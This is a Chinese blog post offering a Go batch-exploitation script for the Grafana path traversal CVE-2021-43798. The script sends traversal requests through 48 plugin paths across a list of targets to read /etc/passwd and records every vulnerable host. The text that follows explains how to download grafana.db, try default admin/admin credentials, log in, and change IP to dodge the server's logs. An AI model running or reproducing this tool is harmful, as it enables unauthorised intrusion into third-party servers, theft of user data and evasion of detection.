【原创】CVE-2021-43798 grafana批量验证脚本

项目地址:https://github.com/light-Life/CVE-2021-43798

用golang简单写的脚本

package main

import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	url2 "net/url"
	"os"
	"strings"
)

func main() {
	fileOpen, err := os.Open("url.txt")
	line := bufio.NewReader(fileOpen)
	if err != nil {
		fmt.Println(err)
	}
	test := []string{
		"/public/plugins/alertGroups/",
		"/public/plugins/alertlist/",
		"/public/plugins/alertmanager/",
		"/public/plugins/annolist/",
		"/public/plugins/barchart/",
		"/public/plugins/bargauge/",
		"/public/plugins/canvas/",
		"/public/plugins/cloudwatch/",
		"/public/plugins/dashboard/",
		"/public/plugins/dashlist/",
		"/public/plugins/debug/",
		"/public/plugins/elasticsearch/",
		"/public/plugins/gauge/",
		"/public/plugins/geomap/",
		"/public/plugins/gettingstarted/",
		"/public/plugins/grafana-azure-monitor-datasource/",
		"/public/plugins/grafana/",
		"/public/plugins/graph/",
		"/public/plugins/graphite/",
		"/public/plugins/heatmap/",
		"/public/plugins/histogram/",
		"/public/plugins/influxdb/",
		"/public/plugins/jaeger/",
		"/public/plugins/live/",
		"/public/plugins/logs/",
		"/public/plugins/loki/",
		"/public/plugins/mixed/",
		"/public/plugins/mssql/",
		"/public/plugins/mysql/",
		"/public/plugins/news/",
		"/public/plugins/nodeGraph/",
		"/public/plugins/opentsdb/",
		"/public/plugins/piechart/",
		"/public/plugins/pluginlist/",
		"/public/plugins/postgres/",
		"/public/plugins/prometheus/",
		"/public/plugins/stat/",
		"/public/plugins/state-timeline/",
		"/public/plugins/status-history/",
		"/public/plugins/table-old/",
		"/public/plugins/table/",
		"/public/plugins/tempo/",
		"/public/plugins/testdata/",
		"/public/plugins/text/",
		"/public/plugins/timeseries/",
		"/public/plugins/welcome/",
		"/public/plugins/xychart/",
		"/public/plugins/zipkin"}
	file, err := os.Create("test.txt") //创建文件
	if err != nil {
		fmt.Println(err)
	}
	for {
		content, _, err := line.ReadLine()
		if err == io.EOF {
			break
		}
		fmt.Println(string(content))
		for i := 0; i < 48; i++ {
			url := string(content) + test[i] + url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")
			//fmt.Println(url)
			resp, err := http.Get(url)
			if err != nil {
				fmt.Println(err)
				continue //continue忽略当前循环体内的剩下代码,相当于python异常里的pass,
				// 这里很关键,如果这里有错误,下面ioutil.ReadAll就无法读取到数据,
				// 就会报空指针错误,加上return返回一下因为这里没值,所以就相当于python的pass。
			}
			fmt.Println(resp, url)
			body, err := ioutil.ReadAll(resp.Body)
			if err != nil {
				fmt.Println(body, err)
			}
			if find := strings.Contains(string(body), "root:"); find {
				fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
				data, err := io.WriteString(file, url+"\n")
				fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
				if err != nil {
					fmt.Println(data, err)
				}
				break
			} else {
				fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
			}
		}
	}
}

直接go run hello.go运行即可

验证存在后访问var/lib/grafana/grafana.db

即可下载这个数据库文件打开user的表

密码是加了盐的,一般无法破解(加盐是为了应对短密码被彩虹表爆出来
也就是碰撞盐(salt)是个随机值,加密大概公式为md5(md5(passwd)+salt)每多一位破解难度成指数上升)

发现这login为admin的一般密码也为admin

登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的

==>转载请注明来源哦<==
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇